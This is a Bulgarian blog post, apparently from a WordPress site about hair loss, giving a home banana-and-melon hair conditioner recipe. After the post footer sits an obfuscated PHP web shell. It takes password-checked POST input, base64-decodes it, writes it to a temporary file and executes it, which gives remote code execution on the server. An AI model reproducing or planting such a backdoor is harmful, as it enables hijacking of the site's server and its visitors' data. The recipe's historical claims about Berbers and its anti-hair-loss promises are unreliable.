Рецепта срещу косопад с банан | Косопад

Домашен балсам с банан за подхранване на косата

косопад

Рецепта срещу косопад с банан

Съществуват много домашни рецепти срещу косопад, които могат да ни бъдат от изключителна полза не само при наличие на проблем с косата, но и като превенция на оплешивяването. Предлагаме ви една от тях, която ще направи косата ви по – мека, по – жизнена и блестяща откогато и да било.

Домашен балсам с банан

Тази рецепта против косопад е взаимствана от Испания, където е пренесена по време на мавританското нашествие преди повече от 1 200 години. На Иберийския полуостров тя е изключително популярна най – вече сред нежната половина от населението. Има сведения от исторически извори, че бананите са широко използвани от берберите за приготвяне на различни козметични рецепти и за поддържане на кожата

Балсамът срещу косопад с банан е много лесен за приготвяне и не само заздравява косата, но и я прави по – мека и лесна за поддържане. В подходящ съд трябва да се смесят половинка добре узрял банан (каквито у нас трудно се намират, бъдете внимателни), малко парченце пъпеш, 1 супена лъжица зехтин и 1 супена лъжица извара от истинско мляко.

рецепта за косопад с банан

Така трябва да изглежда балсамът срещу косопад

Добре разбърканата смес се нанася обилно върху прясно измитата коса и се оставя да престои около тридесет – четиридесет минути. След това се изплаква само с хладка вода, при което не използвайте никакви препарати. Достатъчно е да се прави един път в седмицата.

За да има максимален ефект от домашните рецепти против косопад, не забравяйте да спазвате и другите основни правила за здрава и гъста коса – хигиена, здравословно хранене, общуване с природата и др.

05. април 2013 18:13:33 от Косопад
Категории: Рецепти при косопад | Етикети: , , | Напишете Коментар

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}